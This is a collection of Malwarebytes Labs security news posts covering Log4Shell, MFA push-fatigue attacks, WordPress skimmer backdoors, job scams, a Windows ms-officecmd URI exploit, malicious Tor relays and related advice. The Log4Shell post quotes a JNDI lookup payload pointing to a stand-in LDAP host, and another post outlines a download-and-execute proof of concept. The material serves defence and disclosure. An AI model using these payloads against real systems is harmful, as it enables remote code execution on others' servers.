IT NEWS

If you’re running a service that relies on Apache Struts or uses the popular Apache Log4j utility we hope you haven’t made plans for the weekend.

An exploit listed as CVE-2021-44228 was made public on December 9, 2021. The exploit is simple, easy to trigger, and can be used to perform remote code execution (RCE) in vulnerable systems, which could allow an attacker to gain full control of them. All an attacker has to do is get the affected app to log a special string. For that reason, researchers have dubbed the vulnerability “Log4Shell”.

The vulnerability has a CVSS score of 10.0 out of a possible 10. It impacts Apache Log4j versions 2.0-beta9 to 2.14.1. Mitigations are available for version 2.10 and higher.

Log4j is an open source logging library written in Java that was developed by the Apache Software Foundation. Millions of applications use it, and some of them are enormously popular—such as iCloud, Steam, and Minecraft—so the potential reach of this problem is enormous.

Used in the wild

After the 0-day was posted on Twitter, along with a proof-of-concept that was published on GitHub, the exploit has already been spotted being used in the wild by CERT New Zealand, CERT Austria, and CERT Germany. Along with many others, they are seeing automated systems trying to exploit the vulnerability.

The vulnerability is triggered by a simple string sent to a vulnerable server:

${jndi:ldap://example.com/a}

When the vulnerable application logs the string it triggers a lookup to an attacker-controlled remote LDAP server (example.com in our scenario). The response from the malicious server contains a path to a remote Java class file that’s injected into the server process. Attackers can execute commands with the same level of privilege as the application that uses the logging library.

Given how common this library is and how serious the consequences of a relatively easy-to-exploit vulnerability can be, this is a recipe for disaster. Many organizations will not even realize they are vulnerable.

According to researcher Marcus Hutchins, in the case of Minecraft, attackers were able to get remote code execution on Minecraft servers by simply pasting the malicious string into the chat box. Similar examples exist for a number of other popular services.

Mitigation

Mitigations are available for versions of log4j 2.10.0 and up. Version 2.15.0 is not vulnerable by default. Note that there may be other dependencies, such as your Java version, that need to be updated before you can upgrade. Fixing the vulnerability may not be straightforward, but it is urgent.

According to the Apache log4j project, if you are unable to upgrade, for whatever reason, you can mitigate this vulnerability in version 2.10.0 or higher by switching log4j2.formatMsgNoLookups to true. This can be done by adding ‐Dlog4j2.formatMsgNoLookups=True to the JVM command for starting the application.

Sadly, there is little, if anything, that users of affected systems can do to make themselves less vulnerable to the consequences. No doubt many systems will be affected and system administrators will want to treat anomalies with extreme caution.

So, if you’re an administrator looking forward to a quiet weekend, you know what to do!

Stay safe, everyone!

The post Log4j zero-day “Log4Shell” arrives just in time to ruin your weekend appeared first on Malwarebytes Labs.

Researchers have discovered that Nobelium—the threat actor behind the infamous SolarWinds supply-chain attack, the Sunburst backdoor, TEARDROP malware, GoldMax malware, and other malicious activities—has found a way to use stolen credentials even when they require multi-factor authentication that relies on smartphone push notifications.

And the technique used by this highly sophisticated threat actor? Nag users until they get bored.

Stealing credentials

In a report by Mandiant that describes several attack stages and scenarios by this group, one that jumped out at me involved the threat actor compromising service providers, and then using the privileged access and credentials belonging to these providers, to compromise downstream customers.

Attackers used the stolen credentials in a login page, which triggered a push notification to a device belonging to the credentials’ rightful owner. In theory the attacks should have been stopped there, because one of the two factors required for authentication—the push notification—needed the victim’s consent. In practice, that didn’t always work.

Nobelium used several tactics to get hold of valid credentials:

• CRYPTBOT, an info-stealing malware.
• Spear phishing campaigns.
• Password guessing or password spraying.
• Backdoors like FoggyWeb.

But often, having these credentials was not enough to gain access to the sensitive information the group was after. Most of the important services and assets required multi-factor authentication (MFA) authentication.

A brief introduction to MFA

Multi-factor authentication requires at least two different forms of authentication, from at least two out of three fairly broad categories:

• The “something you know” category is the factor we are most familiar with. It requires a person to enter information that they know in order to gain access to their account. Passwords and PIN codes are the most common examples, but things like security questions used by your bank also fall into this category.
• The “something you have” factor leans on something you have access to. That might be a separate email account or phone to which a verification code can be sent, but it can also be specialized hardware like a YubiKey.
• The “something you are” category centers on certain physical markers (biometrics) that can be analyzed by technology to prove your identity. The most common examples are fingerprints and face recognition.

The most common forms of multi-factor authentiction rely on a password (something you know) and a PIN code or push notification sent to your phone (something you have).

Push notifications as a second factor

Many MFA providers use a second factor that sends a push notification or phone call to a user’s phone just after they’ve entered a password. Users are expected to press a key on a phone app to approve the login. (These fall into the “something you have” category, because you need physical access to the phone to approve the login.)

If a user receives a push notification out of the blue, at a time when they aren’t trying to log in, that means somebody else is trying to use their password. If that happens they obviously aren’t supposed to approve the login.

Mandiant’s research reveals that a threat actor found a way around this form of authentication by simply issuing repeated MFA requests until the user became so bored, confused or frustrated they accepted.

Perhaps this shouldn’t be a surprise. In circumstances where users are busy, pressed for time, or simply tired of dialog boxes or notifications, many have the gut reaction to do whatever it takes to stop the nuisance that is distracting them. If all they have to do is hit “OK” on a prompt (a prompt they have seen lots of times before when it was perfectly safe to hit “OK”), many may not even think twice. Or if they do, it will be too late.

Push vs SMS

Push notifications are often seen as an improvement over a more widely used but less secure form MFA that relies on SMS messages. Instead of hitting “OK” on a push notification, users enter a code—sent by SMS to their phone—alongside their username and password.

This attack shows that logic might not be right, at least not for everyone. Because push notifications are triggered automatically they could potentially be used in a “spray and pray” type of attack, where the threat actor tries to break into many different accounts at the same time, hoping that lots of people will absent-mindedly hit OK.

By contrast, attackers who want to compromise SMS-based MFA have to find a way to intercept the code being sent to the victim. Attacks often do this by persuading the victim’s cellphone carrier that they own the number and want to move it to a different phone, which puts the attacker in possession of the victim’s “someting you have”. Although this is highly effective, and serious enough that it’s causing people to move away from SMS-based MFA, it is very difficult to compromise lots of different phone numbers with this kind of “SIM swap” attack at the same time. So while it is very effective in targeted attacks, SIM swapping is completely unsuitable for large-scale attacks.

It’s also worth noting that the reflex to click “OK” to stop the annoying prompts does not work for SMS.

SMS authentication can potentially be exploited on a large scale by phishing though. If attackers can lure victims to a fake login page they can capture their usernames, passwords, and 2FA codes and then forward them to the real login page. Obviously, due to the normally very limited lifespan of the code, the attacker will have to be fast.

Mitigation

Both SMS and push notication-based MFA are improvements over no MFA at all, but both have their flaws. As an organization you should consider using a more restrictive type of MFA, at least for important assets.

Hardware keys are a much more robust second factor. They may be more expensive, but imagine the cost of a major breach they could save you from.  

Until you start using hardware keys, we hope that if you receive an unexpected prompt you will alert your security team, rather than try to get rid of it as fast as you can.

Stay safe, everyone!

The post Click “OK” to defeat MFA appeared first on Malwarebytes Labs.

An attempt at a simple definition: a search engine is a software system that allows users to find content on the Internet based on their input.

The introduction of the major search engines brought about huge changes in the way we use the Internet. There is a wealth of knowledge available for those that know where to look. One search engine has become such an important factor of our online life that to google has become an accepted verb. It was even elected the “most useful word of 2002” by the American Dialect Society. At the time of writing over 90% of the search engine market has been acquired by Google.

Search queries

The time that the input for a search engine was limited to text queries have long gone. Most major search engines also offer you the option to perform reverse image search. Using reverse image searches, you can find images similar to the one that you are querying for.

The most popular search queries of a year can tell historians from the future what we cared most about at the time. The top 3 for 2020 was:

1. Election results
2. Coronavirus
3. Kobe Bryant

Search engine optimization

The fact that companies want to be found by search engines has led to a set of marketing techniques aimed at raising the popularity of a website. The goal is to have your site high up in the search results when a user searches for certain keywords that are relevant for your business. The name for these techniques is search engine optimization (SEO). The ranking of a site in Google’s search results is primarily based on how well the page is optimized, but it’s also based on “reputation.” The reputation of a page is calculated, among others, by using the number of inbound links pointing to that page. It helps a lot if the incoming links come from pages that are about the same or related subjects, but a large amount of links coming from all kinds of sites helps as well.

Default search engine

Sometimes you will see prompts that the default search engine of your browser was changed, or you will be asked to change the default search engine.

In the example displayed above, Chrome is warning the user about a search hijacker that has taken control of the user’s default search engine. You may also see a browser asking you to change back to the default search engine it came with, or even websites asking you to change your default search engine.

How do search engines make money?

Although there are different ways in which search engines make money, the majority comes from asking for money from companies that want to show up in search results in a noticeable way.

• Organizations can buy advertisements that get displayed above the actual search results.
• Organizations can pay to get their logo and core information displayed along the search results leading to their websites.
• Organizations can pay for marketing data based on consumer’s habits.
• Search engines can sell their search results to others so they can create directories, verticals, or catalogs.
• Search engines can sell clicks on links in the search results.

The revenue of these activities are so profitable that some potentially unwanted programs and adware programs make money for their creators in the form of search hijackers.

How do search engines work?

Where do search engines find the results that are a fit with the query and how do they do it so fast? Most search engines are crawlers. A crawler search engine generates its results by the automatic compilation of web pages and sites. Websites that can not be crawled are part of the Deep Web. The Deep Web is what we call the unindexed part of the Web, which is any site that a search engine can’t find. A part of the Deep Web that you may have heard of is the Dark Web. The Dark Web is intentionally hidden, anonymous, and widely known for illicit activities.

Or as this meme explains it with a wink at those struggling for good SEO results:

Crawlers are directories and verticals, which are different kinds of user-generated collections of search results and sites. If these selected results are paid for, then we call these sponsored search engines.

The speed with which the major search engines can come up with search results are due to data centers around the world. While you’re typing your search query, the search engine predicts the rest of your query, combs through billions of web pages, ranks the sites, images, videos, and products it finds, and presents you with the very best results. And it does all that usually in less than a tenth of a second. To us mere humans that is practically instant. From wherever in the world you perform a Google search, the results are most likely served to you from nearby computers.

What is the most private search engine?

There are several search engines that help you maintain your anonymity online while searching for answers to your queries. Of those, DuckDuckGo and Brave are the most well-known ones. Both are crawlers and can deliver speedy results, without tracking user searches, building user profiles, or requiring the use of an external, pre-existing search index to deliver results.

And for those that are looking for a search engine that is both privacy and environmentally friendly, you can have a look at Ecosia.

Choosing a search engine

You can find and change the default search engine in your browser settings. Where exactly depends on your browser, but in the browsers I checked it is one of the main items in the “Settings” menu.

Which one you should use? Whatever suits your needs best. We always like our readers to make up their own mind while we try and provide them with the information to base their decision on.

Happy searching and stay safe, everyone!

The post What is a search engine and why does anyone care which one you use? appeared first on Malwarebytes Labs.

Skimmers and other threat actors are backdooring websites, and WordPress instances in particular, according to a recently released report.

Researchers at Sucuri say attackers have developed methods to make sure that their grip on the infected site is not easily removed by applying the next update. They create a backdoor for themselves so they can easily take back control and insert their own code.

WordPress as a target

WordPress, the most popular web content management system (CMS), has seen its fair share of plugins that leave online shoppers vulnerable.

One common mistake website owners often make is to leave their CMS unpatched thinking they are not an interesting target. In many cases, users may choose not to apply security updates for fear of introducing bugs or even stop a website from loading properly. This behavior creates the perfect opportunity for online criminals to exploit known vulnerabilities on a large scale.

However, the research by Sucuri shows that even site owners that patch promptly are not safe from certain threat actors.

Creating a backdoor

To make sure they can stay inside the site once they’re in, the threat actors create a backdoor that either re-inserts the malicious code or allows the threat actor access to do it manually. Attackers have developed different methods for protecting their work.

In most cases of this type of infection, we will find a modified index.php which in some cases automatically regenerates itself through a malicious process running in the background. The persistent, running processes on the server are what allows the malware to automatically and immediately reinfect the site once the infection is removed. Even on non-WordPress sites the attackers will replace index.php with an infected copy of the WordPress index.php file.

In other cases, the researchers found hundreds or sometimes thousands of infected .htaccess files scattered throughout the website directories. These are designed to prevent custom PHP files or tools from running on the site in case there’s mitigation already in place.

In other cases you may find a modified wp-includes/plugin.php file designed to re-create the index.php and .htaccess. But even though plugin.php is a common point of attack, similar code has been found in other core files.

Identifying and cleaning the problem

Malicious code on your website can be planted there for various reasons, such as for card skimming or spreading malware. To keep an eye on your site, the following areas are important:

• File integrity, make sure that your core files can’t be changed without you being aware of the changes. One option to do this is file integrity monitoring through active server-side scanners.
• Logging. All important changes on your site should be visible in logs. New plugins, updates of the CMS and plugins, and file changes should be monitored. If you do not recognize them as something you implemented, then investigate them.

This Sucuri blog has elaborate instructions on how to remove these infections, should you find your site has fallen victim to these threat actors.

Protecting your site

For website owners there are some guidelines to stay safe from these  practices.

• Put your website behind a firewall. Or take other measures that restrict access to the wp-admin area to only specific IP addresses.
• Regularly change all admin passwords associated with your site. This includes the admin dashboard, CPanel/FTP, ssh and email. Where possible enable MFA.
• Keep all plugins, themes and your CMS up to date at all times and remove any unneeded plugins or themes. Speed is important. Attackers are always aware of the latest vulnerabilities and will scan the Internet for unpatched sites to hijack, sometimes within hours of a patch being made available.

You can read more in our article: How to defend your website against card skimmers.

For visitors of shopping sites, take as many precautions as possible. There are browsers and browser configurations that will help you against falling victim to skimmers, malicious redirects, and other unwelcome code on a site you are visiting.

Stay safe, everyone!

The post Has your WordPress site been backdoored by a skimmer? appeared first on Malwarebytes Labs.

If you’re job hunting at the moment, be on your guard. The pandemic is still around. Lots of people are in need of employment. Scammers are all too happy to string folks along with bogus employment offers, as is the case here.

How have they managed to snare prospective job hunters?

Riding on the coat-tails of giants

Nefarious individuals have been stringing would-be employees along using fake interviews. The fraudsters claim to be well known video game developers. Unfortunately, there are folks out there who’ve already lost out financially. It’s likely that they won’t be getting their money back.

These fakers claiming to be HR reps from the impacted organisations weren’t shy about who they impersonated. Rockstar Games (Grand Theft Auto), Manticore Games (Core) and others were spoofed. Riot Games, developer of League of Legends, have taken legal action over the bogus job offers.

The lawsuit sues “unnamed” individuals for infringement and fraud. According to Polygon, Riot is using the lawsuit to find out more about the scammers before taking further action.

How did the scam work?

Like many bogus job offers, it’s a combination of contacting potential victims or having them respond to fake job postings. Riot mentions that some of its employees are being impersonated to make it all seem more convincing. It’s a safe bet the scammers have harvested some names from social media, such as LinkedIn listings.

Fake interviews would then be conducted on whichever platform the victims had made initial contact through. Discord is mentioned, and we’d be surprised if apps like WhatsApp weren’t also in use. These are patterns that regular readers will be familiar with, such as holding fake interviews on Telegram in Bitcoin scams.

Show me the money

As with the above linked scams, eventually the fakers will ask for money upfront. This is to purchase “work equipment”, which they claim will be refunded back to the victim afterwards. Of course, this doesn’t happen and the victim is out of pocket while the fraudsters vanish with the cash. While alarm bells may ring for many when asked for money upfront, it’s not so easy for younger applicants. A combination of inexperience, a convincing scam, and uncertainty about business practises during pandemic times mean this has a decent chance of succeeding.

Indeed, Riot Games note one victim has already been in touch claiming to have lost money. At this point, we don’t know if the money was wired or sent in the form of digital currency. What we can say for sure is that bogus job offers won’t disappear over the holiday season.

The perils of job hunting online

Unfortunately it’s a tough thing to land a job online. Placing personal data onto resume/job hunt sites can go wrong if the data is scraped or leaked. Many sites will ask you to be as thorough as possible, but this means home addresses, phone numbers, and dates of birth all over the place. Once it’s swiped, it’s swiped. You need to carefully assess how much you’re willing to reveal to the world at large in a worst case scenario and act on it appropriately.

Social media makes it easy for anyone to talk to you, but this also means scammers have the same ability. When your data is mined, you end up gravitating towards people with the same likes and interests. This gently nudges many similar fish into one huge digital barrel, and scammers can pick and choose targets at their leisure. We’re not saying people don’t receive genuine job inquiries on social media, but it definitely pays to be careful. Even verified accounts can be compromised, so you can never be 100% sure if that offer is legit.

Time to verify 

For something as important as a job offer or interview, we’d suggest asking to speak to a second person at the organisation in question from a valid company email address at the very least. If you’re still not sure, you could always ask a second person from that org on social media if what you’re being sent is the real deal.

If you’d like some more general tips for avoiding fake job offers online, rest assured we’ve got you covered.

You don’t want to be out of pocket at the end of the year thanks to a scammer, so if you’re hunting for a job at the moment we wish you the very best of luck.

The post Fake job interviews plague major game developers like Riot Games and Rockstar appeared first on Malwarebytes Labs.

Researchers at Positive Security have discovered a drive-by remote code-execution (RCE) bug in Windows 10. The vulnerability can be triggered by an argument injection in the Windows 10 default handler for ms-officecmd: URIs. It is likely that this vulnerability also exists in Windows 11.

What’s worrying is that the research team simply decided to find a code execution vulnerability in a default Windows 10 URI handler, and that they succeeded within two weeks. Given how many URI handlers are included in Windows you can bet that there are others to be found.

What is an URI handler?

A Uniform Resource Identifier (URI) is a unique sequence of characters that identifies a logical or physical resource used by web technologies. The well-known uniform resource locator (URL) and the uniform resource name (URN) are both examples of URIs. A URI handler is the program that gets launched to open a URI of a certain type. For example, the URI handler for ftp links can be different from the URI handler that deals with http links. This depends on your settings and often on which software and apps you have installed.

The problem handler

In this case the code execution is triggered by a malicious website which performs a Javascript redirect to a crafted ms-officecmd: URI (a scheme used by the Microsoft Office Universal Windows Platform (UWP) app to launch other Office desktop applications).

As an alternative to exploitation through malicious websites, crafted ms-officecmd: URIs could also be delivered via desktop applications performing unsafe URL handling. However, this exploit only works if the user has Microsoft Teams installed but it is not running.

ms-officecmd

While looking for viable candidates, the ms-officecmd: scheme immediately grabbed the attention of the research team due to its promising name. MS Office is a very complex suite of applications with many legacy features and a long history of exploitability. On top of that, the scheme ends in the abbreviation for ‘command’, which suggests even more complexity and potential for injection.

When the team started playing around with it, they noticed an executable called LocalBridge.exe which would briefly run, but would show no apparent external effect.

The research team decided to decompile LocalBridge.exe. which taught them how to create a valid JSON payload. It turned out they had to dig deeper. That meant analyzing AppBridge.dll next, since it contained the LaunchOfficeAppValidated method which the JSON payload is ultimately passed to.

As a different approach to dissecting the application that handles ms-officecmd: URIs, they tried inspecting an application which generates URIs that get handled by ms-officecmd:.They ended up at the Office UWP app. In this context it is good to know that the Office apps for phones using Windows 10 Mobile (Word, Excel, PowerPoint, OneNote) reached end of support on January 12, 2021. That means that since that date, app users no longer receive security updates, non-security hotfixes, free assisted support options or online technical content updates from Microsoft.

After some tinkering, the researchers managed to use the extracted JSON payload to open Office desktop applications via ms-officecmd: URIs. Specifically, the payload extracted from the Office UWP app could be used to open Outlook.

Phishing angle

The researchers found that when an http(s) URL was provided in the filename property, Outlook would render the respective webpage in an IE11 powered embedded web view. No indication of the webpage’s origin or even the fact that the displayed content stemmed from an external webpage was given. This behavior could be abused to mount very believable phishing attacks, especially since mailto: links are, depending on local configuration, expected to open the user’s email program.

Based on this information, the researchers crafted a PoC that does the following once a user can be tricked into clicking a link on a malicious website:

• A malicious executable named outlook.exe is saved to the victim’s download folder by dynamically adding an iframe that points to the exe file.
• The innocent looking mailto: link target is replaced with a malicious ms-officecmd: URI which references the downloaded executable in its filename property.
• The user confirms the ‘Open LocalBridge?’ dialog, which is not an explicit security warning.
• When Outlook is starting up, it displays a warning dialog about opening a potentially unsafe hyperlink. The user confirms opening the local ‘outlook.exe’ file since they are expecting outlook to be opened.
• The downloaded file is executed.

Patched or not?

The researchers have been going back and forth with Microsoft about this for months, having initially disclosed the weakness to Microsoft in March. Microsoft closed Positive Security’s initial report the very next day, based on what Positive Security called Microsoft’s “erroneous” belief that the exploit relies on social engineering, which would not meet the definition of a security vulnerability.

According to the researchers, the patch that was issued after five months seems to only affect Teams and Skype. The argument injection vulnerability described in this post is still present on fully patched Windows 10 and 11 systems. After the researchers brought this to Microsoft’s attention, they were told another patch addressing the argument injection was underway. Microsoft gave the researchers the go-ahead to post their write-up independently of its rollout.

Unfortunately, I was unable to confirm this. None of my Windows 10 machines have Edge Legacy installed and IE crashes on every exploit attempt, which is also annoying but not what I was waiting to see. When I tried it on the latest version of Edge, Malwarebytes Browser Guard blocked the download of the “outlook.exe.”

Anyway. This goes to show it pays to actually read the prompts and hover the links.

Stay safe, everyone!

The post Vulnerability in Windows 10 URI handler leads to remote code execution appeared first on Malwarebytes Labs.

A mysterious threat actor has run thousands of malicious servers in entry, middle, and exit positions of the Tor network. Tracked as KAX17, the threat actor ran at its peak more than 900 malicious servers part of the Tor network, which typically tends to hover around a daily total of up to 9,000-10,000.

Tor nodes

The Tor network, as defined by the official website is a group of volunteer operated servers that improve the privacy and security of one’s data. Tor nodes are also referred to as routers or relays. They receive traffic on the Tor network and pass it along. A series of virtual tunnels are created between all nodes of the Tor network, and for each data transmission a random path of tunnels, known as the relay path, is chosen.

Some of these servers work as entry-guards, others as middle-relays, and yet others as exit-nodes from the Tor network. All Tor traffic passes through at least three relays before it reaches its destination.

Servers without contact information

Servers added to the Tor network typically must have contact information included in their setup, such as an email address, so Tor network administrators and law enforcement can contact server operators in the case of a misconfiguration or file an abuse report.

This policy, however, is not policed very strictly, mainly to ensure there’s always a sufficiently large number of nodes. But a security researcher and Tor node operator going by Nusenu told The Record this week that they observed a pattern in some of these Tor relays with no contact information, which they first noticed in 2019 and have traced back as far as 2017.

Grouping the servers by similarities, the researcher arrived at a threat actor they named KAX17. This threat actor has constantly added servers with no contact details to the Tor network in industrial quantities, operating servers in the realm of hundreds at any given point. These servers are typically located in data centers spread all over the world and are typically configured as entry and middle points primarily, although KAX17 also operates a small number of exit points.

The purpose

Given the number of servers run by KAX17 the calculated probability of a Tor user connecting to the Tor network through one of KAX17’s servers was 16%, there was a 35% chance they would pass through one of its middle relays, and up to 5% chance to exit through one.

This would give the threat actor ample opportunity to perform a Sybil attack. A Sybil attack is a type of attack on a computer network service where an attacker subverts the service’s reputation system by creating a large number of pseudonymous identities and uses them to gain a disproportionately large influence. This could lead to the deanonymization of Tor users and/or onion services.

Given the cost and effort put into this and the fact that actors performing attacks in non-exit positions are considered more advanced adversaries because these attacks require a higher sophistication level and are less trivial to pull off, it is highly likely this is the work of a high-level (state-sponsored?) threat actor. As for who is behind this group, neither Nusenu nor the Tor Project wanted to speculate.

A spokesperson for the Tor Project confirmed Nusenu’s latest findings and said it had also removed a batch of KAX17 malicious relays.

“Once we got contacted, we looked through all the relays in the network and identified several hundred relays that are very likely belonging to the same group and removed them on November 8.”

Exit nodes

Other malicious actors have been known to control a great percentage of the exit nodes. These exit nodes were used in man-in-the-middle attacks to remove encryption from web traffic where possible, known as SSL stripping, primarily targeting cryptocurrency-based traffic, especially those visiting Bitcoin and cryptocurrency tumbling services. For example, the attacker can redirect the user to cryptocurrency sites featuring the attacker’s Bitcoin wallet address in the hope that the user won’t notice the difference. If the user doesn’t pay attention, they’ll send the attacker their cryptocurrency rather than the website or service, losing them in the process.

How to stay safe

Especially traffic that runs through Tor exit nodes, using the standard HTTP protocol is unencrypted and will give a malicious exit node complete access to the content.

How you can prevent this:

• The easiest way to stay safe from bad exit nodes is not to use them. If you stay within Tor hidden services (the Dark Web), you can keep all your communications encrypted. This works well when possible, but it isn’t always practical.
• Use end-to-end encryption. More sites than ever are using HTTPS to secure your communications, rather than the old, insecure HTTP standard.
• Use websites and services that don’t report on your activities as a matter of course. As an example, switching from Google search to DuckDuckGo reduces your trackable data footprint.
• Do not use any personally identifiable information. Again, not always practical, but worth limiting it as much as you can.
• Avoid sites and services that require you to log in. After all, sending your login credentials through a malicious Tor exit node would compromise the login.
• Use a VPN. A Virtual Private Network (VPN) keeps you safe from malicious exit nodes by continuing to encrypt your data once it leaves the Tor Network.

Stay safe, everyone!

The post Was threat actor KAX17 de-anonymizing the Tor network? appeared first on Malwarebytes Labs.

Microsoft has taken control of 42 web domains that a hacking group was using to try to breach its targets.

On December 2, the Microsoft Digital Crimes Unit (DCU) filed pleadings with the US District Court for the Eastern District of Virginia seeking authority to take control of the sites that it discovered belonged to a China-based group it calls Nickel. The court order was unsealed December 6 following completion of service on the hosting providers, and traffic from the websites is now routed to computer servers controlled by Microsoft.

The disruption is unlikely to prevent Nickel from pursuing its hacking activities, but it has put a spanner in its works, effectively removing a key piece of the infrastructure the group has been relying on for its latest wave of attacks. Sadly, any setback to the Chinese hacking group or others will likely be temporary as the hackers will find and build new infrastructure to use in forthcoming attacks.

Nickel

Others in the security community who have researched this group of actors refer to the group by other names, including KE3CHANG, APT15, Vixen Panda, Royal APT, and Playful Dragon. Malwarebytes generally uses the APT15 designation for this group.

The group’s activities have been traced back to 2010 when it performed a cyberespionage campaign directed at diplomatic organizations and missions in Europe.

Targets, methods, and techniques

Nickel’s techniques vary, but in the end the group’s activity has only one objective, namely to implant stealthy malware for getting into networks, stealing data, and spying on government agencies, think tanks, and human rights organizations.

For initial access, the DCU noticed Nickel using older, and patched, vulnerabilities in Microsoft products like Microsoft Exchange and SharePoint, but also compromised VPN suppliers or obtained stolen credentials. For lateral movement the DCU saw Nickel actors using Mimikatz, WDigest, NTDSDump, and other password dumping tools during attacks.

Then followed a drop of hard-to-detect malware that enabled intrusions, surveillance and data theft targeting organizations in Argentina, Barbados, Bosnia-Herzegovina, Brazil, Bulgaria, Chile, Colombia, Croatia, Czech Republic, Dominican Republic, Ecuador, El Salvador, France, Guatemala, Honduras, Hungary, Italy, Jamaica, Mali, Mexico, Montenegro, Panama, Peru, Portugal, Switzerland, Trinidad & Tobago, the UK, US, and Venezuela.

As a result, Nickel achieved long-term access to several targets, allowing the group to conduct activities such as regularly scheduled exfiltration of data. Microsoft Threat Intelligence Center (MSTIC) observed Nickel perform frequent and scheduled data collection and exfiltration from victim networks. The group’s activity included looking in directories of interest for new files added since the last time it collected data.

One method Nickel uses to hide malware is to drop it into existing installed software paths. The group did this to make the malware appear to be files used for an installed application. These are backdoors capable of collecting system information and have basic backdoor functionalities, including, but not limited to:

• Launching a process
• Uploading a file
• Downloading a file
• Executing a shellcode in memory

A long list of IOCs can be found at the end of this write-up about Nickel by MSTIC.

International cooperation

The Microsoft blog includes a call-to-action for industry, governments, civil society, and others to come together and establish a new consensus for what is and isn’t appropriate behavior in cyberspace. There are some promising developments in this area, like the United States and the European Union joining the Paris Call for Trust and Security in Cyberspace, the Oxford Process which has brought together some of the best legal minds to evaluate the application of international law to cyberspace, and the United Nations taking critical steps to advance dialogue across stakeholders. Nevertheless, every entity with the relevant expertise and resources needs to do whatever they can to help bolster trust in technology and protect the digital ecosystem.

Stay safe, everyone!

The post A chink in the armor of China-based hacking group Nickel appeared first on Malwarebytes Labs.

In recent news, IT security researchers from Ruhr-Universität Bochum (RUB) and the Niederrhein University of Applied Sciences have disclosed 14 new cross-site leak (also known as XSLeak or XS-Leak) attacks that can affects modern browsers, such as Google Chrome, Microsoft Edge, Mozilla Firefox, and Apple’s Safari. Although the news and press release regarding this haven’t mentioned other browsers that are Chromium-based and Firefox-based, we can make a cautious assumption that these, too, could be vulnerable to the new XS-Leak attacks.

But what is XS-Leak? Why should internet users be worried about them? And how can they protect themselves from such web threats?

XS-Leak, explained

An XS-Leak is a type of attack that targets inherent side-channels of a web platform, allowing actors to bypass the ‘same-origin’ policy (SOP) in web browsers so they can steal user information in the background from trusted and legitimate websites. A side-channel can operate as an information leakage channel, as it “allows an attacker to infer information about a secret by observing nonfunctional characteristics of a program, such as execution time or memory consumed.” [1]

The “same-origin policy” is a critical security mechanism. Its purpose is to prevent information from being stolen from websites that users trust. It does this by restricting how documents and scripts from one origin (the URL location) can interact with resources on another origin. Without this policy, an attacker who successfully compromises a script could see everything in a user’s browser.

Browsers support various interactions between websites and web applications. XS-Leaks take advantage of a minute amount of data that is exposed every time this interaction happens between websites.

XS-Leaks Wiki further explains: “The principle of an XS-Leak is to use such side-channels available on the web to reveal sensitive information about users, such as their data in other web applications, details about their local environment, or internal networks they are connected to.”

XS-Leaks has been around since at least the year 2000, and 34 of them have been identified and classified. XS-Leaks can be caused by different things, such as browser APIs, browser implementation details and bugs, and hardware bugs (like vulnerabilities in modern processors that Meltdown and Spectre exploit).

What is the XSinator?

The XSinator is a “browser test suite” or online tool that anyone can use to automatically scan for XS-Leaks vulnerabilities in the user’s mobile and desktop browser. XSinator.com has been created as accompanying material for the researchers’ paper entitled, “XSinator.com: From a formal Model to the Automatic Evaluation of Cross-Site Leaks in Web Browsers” [PDF].

How can I protect myself from XS-Leaks?

Mitigating the risks presented by XS-Leaks falls on the hands of web browser developers. And protecting against this, they continue to do so as some browsers have already implemented a number of new defense mechanisms against it.

IT security researchers from both universities have informed the web browser development teams of their findings and are currently fixing the issues. They also made available detailed technical defenses that browser developers can implement against XS-Leaks in their paper.

The post Is your web browser vulnerable to data theft? XS-Leak explained appeared first on Malwarebytes Labs.

Keeping Windows up to date is an important part of warding off malware, exploits, and other attacks. If you’re not running the latest version of your OS, it can give cybercriminals the leverage they need to compromise your system.

Unfortunately not all machines are running automatic updates by default, depending on your operating system. This used to primarily be a problem on older versions of Windows. With something like Windows 10, you can’t hold back the update tide forever. The best you can do is pause updates for up to 35 days, at which point the only way you can pause again is to install new updates.

Outside of the pause/repeat cycle, most folks would resort to registry edits for longer periods of going without an update. This isn’t recommended for most users. If you’re a regular home user, there’s probably not many specific edge-case reasons why you’d want to have updates switched off.

How to check your Windows update status

Your updates should in theory be running in the background.

If you want to check whether they are, type “Windows update” into the search bar from the Start menu, and click into the Updates section. There, you’ll find a wide range of options and information.

At the very top, you’ll see if you’re up to date or not along with the time the computer last checked. From here, you can also manually check for updates.

If there are additional updates soon to be coming down the pipeline, you’ll also be able to see what they are, along with some details about the update. You can download and install manually before the updates are grabbed automatically.

If your system isn’t compatible with Windows 11, there’ll be a big box letting you know, along with the option to grab the Microsoft PC Health Check App. This will explain in more detail why you may not be able to meet system requirements for Windows 11.

Check your Windows update settings

Underneath the Windows 11 status box is a selection of fine tuning options related to Windows updates. These are:

Pause updates for 7 days. The length of pause required can be altered to your liking in the advanced options (to a maximum of 35 days).

Change active hours. This is for letting Microsoft know which time is best for updates, downloads, and so on. Many folks leave their PCs on overnight, so having all the update heavy lifting take place while asleep is ideal for them. Will you be out during the day? No problem, maybe daytime updates would fit your routine better.

View update history. This can be useful for troubleshooting or just keeping up to date with what’s been going on. Maybe a specific update went AWOL somehow. This is where you’d likely begin your search.

Advanced options. This is where you can alter the pause length for updates. You can also tell the device to receive updates for other Microsoft products when you update Windows. There are additional options for downloading over metered connections, restarting the device “as soon as possible” when a restart is required to install an update, and also various rules for on-screen notifications.

Is Windows update free?

Absolutely, and we recommend you make full use of its capabilities. Your devices will be that little bit more secure with regular automatic updates enabled.

The post How to check for Windows updates and install them appeared first on Malwarebytes Labs.